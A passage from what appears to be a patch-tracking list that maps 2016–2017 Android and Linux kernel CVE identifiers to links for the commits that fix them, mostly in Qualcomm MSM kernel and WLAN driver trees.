-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=3bfe5a89916f7d29492e9f6d941d108b688cb804
-CVE-2016-5859
-	Link - 3.10 - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=302b5348ecbba8cf032a9ffaaa63222a2b285d89
-	Link - 3.18 - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=97fdb441a9fb330a76245e473bc1a2155c809ebe
-CVE-2016-5860
-	Link - 3.10 - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=25ab82f5d7d8d8d3b4c8eaaa02944dd5a81be7c3
-	Link - 3.18 - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=9bcf048a7d1a8a0511feb39d6d3111044e6278ec
-	Link - 4.4 - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=9f91ae0d7203714fc39ae78e1f1c4fd71ed40498
-CVE-2016-5861
-	Link - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=cf3c97b8b6165f13810e530068fbf94b07f1f77d
-CVE-2016-5862
-	Link - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=4199451e83729a3add781eeafaee32994ff65b04
-CVE-2016-5863
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=daf0acd54a6a80de227baef9a06285e4aa5f8c93
-CVE-2016-5864
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=cbc21ceb69cb7bca0643423a7ca982abce3ce50a
-CVE-2016-5867
-	Link - 3.10 - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=8db70aafea51b60dbe9faaba5707be0046758521
-	Link - 3.18 - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=065360da7147003aed8f59782b7652d565f56be5
-	Link - 4.4 - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=5e3dd3f21b44424405a009ba676df52322d9e7cf
-CVE-2016-5868
-	Link - 3.10 - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=dc85dc0b21b1ee3715ee6e80f405d5606ca5e8d2
-	Link - 3.18 - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=0ada77c044be09db1a35e4718209f41d05d27fe0
-	Link - 4.4 - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=fbb765a3f813f5cc85ddab21487fd65f24bf6a8c
-CVE-2016-5870
-	Link - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-3.18.git;a=commit;h=71fe5361cbef34e2d606b79e8936a910a3e95566
-CVE-2016-6136
-	Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=43761473c254b45883a64441dd0bc85a42f3645c
-CVE-2016-6672
-	Link - https://github.com/android/kernel_msm/commit/d8649432b96bd361de20168372c10269e88e1258
-CVE-2016-6675
-	Link - prima - https://source.codeaurora.org/quic/la//platform/vendor/qcom-opensource/wlan/prima/commit/?id=1353fa0bd0c78427f3ae7d9bde7daeb75bd01d09
-CVE-2016-6676
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la//platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=6ba9136879232442a182996427e5c88e5a7512a8
-CVE-2016-6679
-	Link - prima - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/prima/commit/?id=d39345f0abc309959d831d09fcbf1619cc0ae0f5
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=f081695446679aa44baa0d00940ea18455eeb4c5
-CVE-2016-6680
-	Link - prima - https://www.codeaurora.org/gitweb/quic/la/?p=platform/vendor/qcom-opensource/wlan/prima.git;a=commit;h=08ce2a9e1ccdf6081fc1efb47d2edea4f4ad2ecf
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=2f2fa073b95d4700de88c0f7558b4a18c13ac552
-CVE-2016-6681
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=0950fbd39ff189497f1b6115825c210e3eeaf395
-CVE-2016-6682
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=0950fbd39ff189497f1b6115825c210e3eeaf395
-CVE-2016-6683
-	Link - https://android.googlesource.com/kernel/tegra.git/+/android-7.0.0_r0.20
-CVE-2016-6692
-	Link - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=0f0e7047d39f9fb3a1a7f389918ff79cdb4a50b3
-CVE-2016-6693
-	Link - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=ac328eb631fa74a63d5d2583e6bfeeb5a7a2df65
-CVE-2016-6694
-	Link - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=961e38553aae8ba9b1af77c7a49acfbb7b0b6f62
-CVE-2016-6695
-	Link - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=c319c2b0926d1ea5edb4d0778d88bd3ce37c4b95
-CVE-2016-6696
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=c3c9341bfdf93606983f893a086cb33a487306e5
-CVE-2016-6698
-	Link - 3.10 - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=de90beb76ad0b80da821c3b857dd30cd36319e61
-	Link - 3.18 - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-3.18.git;a=commit;h=3baefa3af45c0ab1ca8391821ea55b9049a3a3da
-CVE-2016-6725
-	Link - 3.10 - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=cc95d644ee8a043f2883d65dda20e16f95041de3
-	Link - 3.18 - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-3.18.git;a=commit;h=a8bfc6888280ac70c9c13b1802c1e962522714a4
-CVE-2016-6728
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=37b3cefe6c01bed2e048d7a42b1c4021f4ba279d
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=a3fe90fbd3500e7ecaa32b9da5e582d78cb5cef9
-CVE-2016-6738
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=a829c54236b455885c3e9c7c77ac528b62045e79
-CVE-2016-6739
-	Link - 3.10 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=ac8242269094729c464ac042a58603e01427e509
-	Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=c4af572a7ad59c0f07fd316a08055bc86dfb5f0d
-CVE-2016-6740
-	Link - 3.10 - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=ef78bd62f0c064ae4c827e158d828b2c110ebcdc
-	Link - 3.18 - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-3.18.git;a=commit;h=a939a87f0adf91feceb329a5c080b86e1ee333c7
-CVE-2016-6741
-	Link - 3.10 - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-3.10.git;a=commit;h=80a1d9978c11f76bbe6d2e622bf2ded18f27e34f
-	Link - 3.18 - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=d291eebd8e43bba3229ae7ef9146a132894dc293
-CVE-2016-6742
-	Link - https://github.com/android/kernel_msm/commit/94f4b81da69ec72486476adb59d7c818bd4ffbd0
-CVE-2016-6745
-	Depends
-	Link - https://github.com/android/kernel_msm/commit/80dd4267f644c7ba9657df52f6bce42f0bef1b4e
-	Link - https://github.com/android/kernel_msm/commit/9397e20764da2fdffdfe20e35cb78211753b83cc
-	Link - https://github.com/android/kernel_msm/commit/8667cc5ed59b7a4b64d82d8014bead09bddb1f76
-	Link - https://github.com/android/kernel_msm/commit/19055017169363f176693c3e41ebdfc3c8e11ef4
-	Link - https://github.com/android/kernel_msm/commit/f5c96a8c96615490b72357b1c0940196f7dde474
-CVE-2016-6748
-	Link - 3.10 - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=be651d020b122a1ba9410d23ca4ebbe9f5598df6
-	Link - 3.18 - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-3.18.git;a=commit;h=313d9f89e76ada8d900c9a578cd5cb77d5813625
-CVE-2016-6749
-	Link - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=f9185dc83b92e7d1ee341e32e8cf5ed00a7253a7
-CVE-2016-6750
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=34bda711a1c7bc7f9fd7bea3a5be439ed00577e5
-CVE-2016-6751
-	Link - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-3.18.git;a=commit;h=4907b74ecd5ef8c6d85f1b430f386e381d5b8229
-CVE-2016-6752
-	Link - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?h=0de2c7600c8f1f0152a2f421c6593f931186400a
-CVE-2016-6753
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=5ee75a32931dc70a7af2be42650ac5f14db99674
-CVE-2016-6755
-	Link - 3.10 - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=b5df02edbcdf53dbbab77903d28162772edcf6e0
-	Link - 3.18 - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-3.18.git;a=commit;h=652c8005752b28c22107e928c28aabce1dfdde84
-CVE-2016-6756
-	Link - 3.10 - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=f91d28dcba304c9f3af35b5bebaa26233c8c13a5
-	Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=3a214ef870dc97437c7de79a1507dfe5079dce88
-CVE-2016-6757
-	Link - 3.10 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=cd99d3bbdb16899a425716e672485e0cdc283245
-	Link - 3.18 - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-3.18.git;a=commit;h=f2ba68242d79016cc07b59aa41a67b7a1d36bf9b
-CVE-2016-6786
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f63a8daa5812afef4f06c962351687e1ff9ccb2b
-CVE-2016-6787
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f63a8daa5812afef4f06c962351687e1ff9ccb2b
-CVE-2016-6791
-	Link - https://source.codeaurora.org/quic/la//kernel/msm/commit/?id=30a4f0783d2978e27a8b8856d8e358ccaf5ddab4
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=62580295210b6c0bd809cde7088b45ebb65ace79
-CVE-2016-6828
-	Link - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/include/net/tcp.h?id=bb1fceca22492109be12640d49f5ea5a544c6bb4
-CVE-2016-7042
-	Link - http://git.kernel.org/cgit/linux/kernel/git/stable/linux-stable.git/commit/?id=03dab869b7b239c4e013ec82aea22e181e441cfc
-CVE-2016-7097
-	Depends
-	Link - ^4.8 - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=073931017b49d9458aa351605b43a7e34598caef
-	Link - 3.10 - https://github.com/aosp-mirror/kernel_msm/commit/6b0c893dc08060d6999b07136391d8a298678dae
-	Link - 3.10 - https://github.com/aosp-mirror/kernel_msm/commit/aedf77d56472d1fddf050c61c1017d4f51149fb1
-CVE-2016-7117
-	Link - ^4.5 - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=34b88a68f26a75e4fded796f1a49c40f82234b7d
-	Link - ^4.5 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=0b5240c45e2029986526b1405ab24906c708f770
-CVE-2016-7910
-	Link - https://git.kernel.org/cgit/linux/kernel/git/stable/linux-stable.git/commit/?id=77da160530dd1dc94f6ae15a981f24e5f0021e84
-CVE-2016-7911
-	Link - https://git.kernel.org/cgit/linux/kernel/git/stable/linux-stable.git/commit/?id=8ba8682107ee2ca3347354e018865d8e1967c5f4
-CVE-2016-7912
-	Link - https://git.kernel.org/cgit/linux/kernel/git/stable/linux-stable.git/commit/?id=38740a5b87d53ceb89eb2c970150f6e94e00373a
-CVE-2016-7913
-	Link - https://git.kernel.org/cgit/linux/kernel/git/stable/linux-stable.git/commit/?id=8dfbcc4351a0b6d2f2d77f367552f48ffefafe18
-CVE-2016-7914
-	Link - https://git.kernel.org/cgit/linux/kernel/git/stable/linux-stable.git/commit/?id=8d4a2ec1e0b41b0cf9a0c5cd4511da7f8e4f3de2
-CVE-2016-7915
-	Link - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=50220dead1650609206efe91f0cc116132d59b3f
-CVE-2016-7916
-	Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=8148a73c9901a8794a50f950083c00ccf97d43b3
-CVE-2016-7917
-	Link - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=c58d6c93680f28ac58984af61d0a7ebf4319c241
-CVE-2016-8391
-	Link - https://source.codeaurora.org/quic/la//kernel/msm/commit/?id=30a4f0783d2978e27a8b8856d8e358ccaf5ddab4
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=62580295210b6c0bd809cde7088b45ebb65ace79
-CVE-2016-8392
-	Link - https://source.codeaurora.org/quic/la//kernel/msm/commit/?id=30a4f0783d2978e27a8b8856d8e358ccaf5ddab4
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=62580295210b6c0bd809cde7088b45ebb65ace79
-CVE-2016-8393
-	Link - https://github.com/android/kernel_msm/commit/9397e20764da2fdffdfe20e35cb78211753b83cc
-	Link - https://github.com/android/kernel_msm/commit/fd11eb5c433743c87bebe699604adfd7e7e805cf
-	Link - https://github.com/android/kernel_msm/commit/8a950b2d64cec7b8022b7572c2d3d9221b2dbab2
-CVE-2016-8394
-	Link - https://github.com/aosp-mirror/kernel_msm/commit/4b9ae9048d63ef9fe9f8cc9d0e33cc38148b268d
-CVE-2016-8399
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=0eab121ef8750a5c8637d51534d5e9143fb0633f
-CVE-2016-8401
-	Link - https://github.com/aosp-mirror/kernel_msm/commit/44a8e527e156245eff04ff36f426cb1ba8d23e34
-CVE-2016-8402
-	Link - 3.4 - https://source.codeaurora.org/quic/la/kernel/msm/commit/drivers?id=8e145d45fdff30cb6471b7cc9717c30b21a0ec6b
-	Link - 3.10 - https://github.com/aosp-mirror/kernel_msm/commit/de51c6f363b8ba7c513e8a5bbae3459571966bfd
-CVE-2016-8403
-	Link - https://android.googlesource.com/kernel/tegra/+/de55d30d3ed76ab8b5c61f2ccf730ce86fd59592
-CVE-2016-8404
-	Link - https://source.codeaurora.org/quic/la/kernel/tegra/commit/?id=232ec805c7cc4150f05aa06a98335378ab272ec7
-CVE-2016-8405
-	Link - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=2dc705a9930b4806250fbf5a76e55266e59389f2
-CVE-2016-8406
-	Link - https://github.com/android/kernel_msm/commit/d7a15270ad80aff21d09aaea9c0e98e03e541b50
-CVE-2016-8407
-	Link - https://github.com/android/kernel_msm/commit/c01b4ad61a7e4291ea3db18baaf6c3532eff7e38
-CVE-2016-8410
-	Link - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?h=e2bbf665187a1f0a1248e4a088823cb182153ba9
-CVE-2016-8412
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=42a98c44669d92dafcf4d6336bdccaeb2db12786
-CVE-2016-8413
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=bc77232707df371ff6bab9350ae39676535c0e9d
-CVE-2016-8414
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=320970d3da9b091e96746424c44649a91852a846
-CVE-2016-8415
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=188e12a816508b11771f362c852782ec9a6f9394
-CVE-2016-8416
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=e3af5e89426f1c8d4e703d415eff5435b925649f
-CVE-2016-8417
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=01dcc0a7cc23f23a89adf72393d5a27c6d576cd0
-CVE-2016-8418
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=8f8066581a8e575a7d57d27f36c4db63f91ca48f
-CVE-2016-8419
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=9ba50d536227666a5b6abd51f2b122675d950488
-CVE-2016-8420
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=c6597e015a7ce5ee71d3725fc55e64fc50923f4e
-CVE-2016-8421
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=61a5cdb9adc96645583f528ac923e6e59f3abbcb
-CVE-2016-8434
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.14/commit/?id=3e3866a5fced40ccf9ca442675cf915961efe4d9
-CVE-2016-8436
-	Link - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=228e8d17b9f5d22cf9896ab8eff88dc6737c2ced
-CVE-2016-8444
-	Link - https://github.com/aosp-mirror/kernel_msm/commit/78506ab75e0cbbfbf372867cc24282d7e739f4d6
-CVE-2016-8450
-	Link - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=e909d159ad1998ada853ed35be27c7b6ba241bdb
-CVE-2016-8452
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=39fa8e972fa1b10dc68a066f4f9432753d8a2526
-CVE-2016-8453
-	Link - https://github.com/android/kernel_msm/commit/f10f4e420dddc35dfef53965c55ffd5bdec41a45
-CVE-2016-8454
-	Link - https://github.com/android/kernel_msm/commit/39bd1fc23040a441628884588b19bc4d199b59c2
-CVE-2016-8455
-	Link - https://github.com/android/kernel_msm/commit/068427b76963929b220a4be40cdf77856374df55
-CVE-2016-8456
-	Link - https://github.com/android/kernel_msm/commit/e5c1b001a822e8b38680655c400e7b3f67cc3323
-CVE-2016-8457
-	Link - https://github.com/android/kernel_msm/commit/e5c1b001a822e8b38680655c400e7b3f67cc3323
-CVE-2016-8458
-	Link - 3.10 - https://github.com/android/kernel_msm/commit/d567c744898f67e1c54db5339f41815d02f3d59e
-	Link - 3.18 - https://github.com/android/kernel_msm/commit/11ab3add6cfb1ef752ac38adf1b4bf15617772e9
-CVE-2016-8463
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=cd0fa86de6ca1d40c0a93d86d1c0f7846e8a9a10
-CVE-2016-8464
-	Link - 3.10 - https://github.com/android/kernel_msm/commit/cbf66a616bb08cc6c932e4122f3271df83e253bb
-	Link - 3.18 - https://android.googlesource.com/kernel/tegra/+/ffbad101e158cea6b93965302b2a3c3f8ef11bf8
-CVE-2016-8465
-	Depends
-	Link - 3.10 - https://github.com/android/kernel_msm/commit/8f1621cd0d0ca0bc494a926a1331f582b27b913e
-	Link - 3.10 - https://github.com/android/kernel_msm/commit/50ba575e9cd28ab9537f0961bbc051a6a727da74
-	Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/tegra/commit/?id=4add5112babf94dbc0f86e93395b6622d5080d16
-	Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/tegra/commit/?id=3619fd91b831f184d2e544e23cb54d20eed2531e
-CVE-2016-8465
-	Depends
-	Link - 3.10 - https://github.com/android/kernel_msm/commit/8f1621cd0d0ca0bc494a926a1331f582b27b913e
-	Link - 3.10 - https://github.com/android/kernel_msm/commit/8f1621cd0d0ca0bc494a926a1331f582b27b913e
-	Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/tegra/commit/?id=4add5112babf94dbc0f86e93395b6622d5080d16
-	Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/tegra/commit/?id=3619fd91b831f184d2e544e23cb54d20eed2531e
-CVE-2016-8466
-	Link - 3.10 - https://github.com/android/kernel_msm/commit/67d429b1cb87879c33df58febc0b7bf6712bc7c0
-	Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/tegra/commit/?id=4af032a458109027c88c478c800aac97a7105250
-CVE-2016-8468
-	Link - 3.18 - https://github.com/android/kernel_msm/commit/0d37d64f02e18a301867ae7684c3801bd99c5df2
-CVE-2016-8473
-	Link - https://github.com/android/kernel_msm/commit/900b8b72c57cefebb39c150dfddfdd493a1cea79
-CVE-2016-8474
-	Link - https://github.com/android/kernel_msm/commit/900b8b72c57cefebb39c150dfddfdd493a1cea79
-CVE-2016-8475
-	Link - https://github.com/android/kernel_msm/commit/d906945fc287f9df48b99349fea962b921d4d39e
-CVE-2016-8476
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=bfe8035bce6fec72ed1d064b94529fce8fb09799
-CVE-2016-8477
-	Link - 3.10 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=33c9042e38506b04461fa99e304482bc20923508
-	Link - 3.18 - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=96145eb5f0631f0e105d47abebc8f940f7621eeb
-CVE-2016-8478
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=e3af5e89426f1c8d4e703d415eff5435b925649f
-CVE-2016-8479
-	Link - 3.18 - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=1a9d60a353d6c8191cfec089f8cb502626bb0b0e
-	Link - 4.4 - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=eed663a48bec729bb66aaad18ab3fac3b7269581
-CVE-2016-8480
-	Link - 3.10 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=0ed0f061bcd71940ed65de2ba46e37e709e31471
-	Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=cd70f6025a7bbce89af7a7abf4c40a219fdea406
-	Link - 4.4 - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-4.4.git;a=commit;h=420d51e0733e72830fa591f1e67f5a40ce11dc51
-CVE-2016-8481
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=ce9db0874906f6aedd80bb28d457eadfe38bdd02
-	Link - 4.4 - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-4.4.git;a=commit;h=c8c16b7406c68a5a9f35c5afbfcafd893e197425
-	Link - https://github.com/android/kernel_msm/commit/831da5d113d214db6894e9fd0ce98762ee8a544a
-CVE-2016-8483
-	Link - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=6997dcb7ade1315474855821e64782205cb0b53a
-CVE-2016-8650
-	Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=f5527fffff3f002b0a6b376163613b82f69de073
-CVE-2016-8655
-	Link - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=84ac7260236a49c79eede91617700174c2c19b0c
-CVE-2016-9120
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=9590232bb4f4cc824f3425a6e1349afbe6d6d2b7
-CVE-2016-9191
-	Link - 3.11-^4.8 - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=93362fa47fe98b62e4a34ab408c4a418432e7939
-CVE-2016-9555
-	Link - https://github.com/torvalds/linux/commit/bf911e985d6bbaa328c20c3e05f4eb03de11fdd6
-CVE-2016-9576
-	Link - 3.4 - https://review.lineageos.org/#/c/176402/
-	Link - 3.10 - https://review.lineageos.org/#/c/175603/
-	Link - https://github.com/torvalds/linux/commit/a0ac402cfcdc904f9772e1762b3fda112dcc56a0
-CVE-2016-9604
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=44c037827f0aeddbbbb323930fa3d09a7b4fffca
-CVE-2016-9754
-	Link - http://git.kernel.org/cgit/linux/kernel/git/stable/linux-stable.git/commit/?id=59643d1535eb220668692a5359de22545af579f6
-CVE-2016-9793
-	Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=b98b0bc8c431e3ceb4b26b0dfc8db509518fb290
-CVE-2016-9794
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=a27178e05b7c332522df40904f27674e36ee3757
-CVE-2016-9806
-	Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=92964c79b357efd980812c4de5c1fd2ec8bb5520
-CVE-2017-0403
-	Link - 3.0-^3.18 - https://github.com/android/kernel_msm/commit/2c5c1fd0d2a2a96fab750fa332cb703022c16c04
-CVE-2017-0404
-	Link - ^3.18 - https://github.com/android/kernel_msm/commit/4faa6d2e9b53546823882d8889820ff9ce3c372f
-CVE-2017-0427
-	Link - 3.10 - https://github.com/android/kernel_msm/commit/5db4167c9924c68ab9554bba3a98ecfd14b91a8e
-	Link - 3.18 - https://github.com/android/kernel_msm/commit/1d6d364ee174676a225a77dc7ca8dac887199718
-CVE-2017-0430
-	Link - https://github.com/android/kernel_msm/commit/709105c301aa53fb86c46b36f882998558b19652
-CVE-2017-0433
-	Link - https://github.com/android/kernel_msm/commit/fe160e51f02ee5db529c2e84ac8364c89cce005e
-	Link - https://github.com/android/kernel_msm/commit/2615c5f302441568e6dd20007bc5246d72837e80
-CVE-2017-0434
-	Link - 3.18 - https://github.com/android/kernel_msm/commit/d740e7228bd1578ed01762998b2a86e7df56e608
-CVE-2017-0435
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=ce9db0874906f6aedd80bb28d457eadfe38bdd02
-	Link - https://github.com/android/kernel_msm/commit/831da5d113d214db6894e9fd0ce98762ee8a544a
-CVE-2017-0436
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=ce9db0874906f6aedd80bb28d457eadfe38bdd02
-CVE-2017-0437
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=1f0b036dc74ccb6e9f0a03a540efdb0876f5ca77
-CVE-2017-0438
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=1f0b036dc74ccb6e9f0a03a540efdb0876f5ca77
-CVE-2017-0439
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=81b6b5538d3227ed4b925fcceedb109abb2a4c61
-	Link - qcacld-3.0 - https://source.codeaurora.org/quic/la//platform/vendor/qcom-opensource/wlan/qcacld-3.0/commit/?id=ff866a1e9a0f653252b5d5b7eb087374c5bad65d
-CVE-2017-0440
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=10f0051f7b3b9a7635b0762a8cf102f595f7a268
-CVE-2017-0441
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=da87131740351b833f17f05dfa859977bc1e7684
-	Link - qcacld-3.0 - https://source.codeaurora.org/quic/la//platform/vendor/qcom-opensource/wlan/qcacld-3.0/commit/?id=e578706506f98a4962220066d92d81e853ac7212
-CVE-2017-0442
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=1f0b036dc74ccb6e9f0a03a540efdb0876f5ca77
-CVE-2017-0443
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la//platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=f1081e78eff75ca665c662493736b17cb792b46d
-	Link - qcacld-3.0 - https://source.codeaurora.org/quic/la//platform/vendor/qcom-opensource/wlan/qcacld-3.0/commit/?id=a4c5eefd5dd761445784963f3b6605d24d2bc3af
-CVE-2017-0444
-	Link - https://source.codeaurora.org/quic/la/kernel/tegra/commit/?id=230f280dd4046a227665ff07c9afaa7b9aa1e061
-CVE-2017-0445
-	Link - https://github.com/android/kernel_msm/commit/773179468893965c2b81aa7ffe3722b6868ef749
-	Link - https://github.com/android/kernel_msm/commit/367e64520dba1652d8f6d0ac1ebda3cab0f9e374
-	Link - https://github.com/android/kernel_msm/commit/2615c5f302441568e6dd20007bc5246d72837e80
-	Link - https://github.com/android/kernel_msm/commit/fe160e51f02ee5db529c2e84ac8364c89cce005e
-CVE-2017-0446
-	Link - https://github.com/android/kernel_msm/commit/773179468893965c2b81aa7ffe3722b6868ef749
-CVE-2017-0447
-	Link - https://github.com/android/kernel_msm/commit/773179468893965c2b81aa7ffe3722b6868ef749
-CVE-2017-0449
-	Link - https://github.com/android/kernel_msm/commit/323a28bf14c622bdd1b9ecf09a339b00af98c965
-CVE-2017-0451
-	Depends
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=59f55cd40b5f44941afc78b78e5bf81ad3dd723e
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=35346beb2d8882115f698ab22a96803552b5c57e
-CVE-2017-0452
-	Link - https://github.com/android/kernel_msm/commit/4fa7499742c56c7f7064c9dc14c3a34f4be38851
-CVE-2017-0453
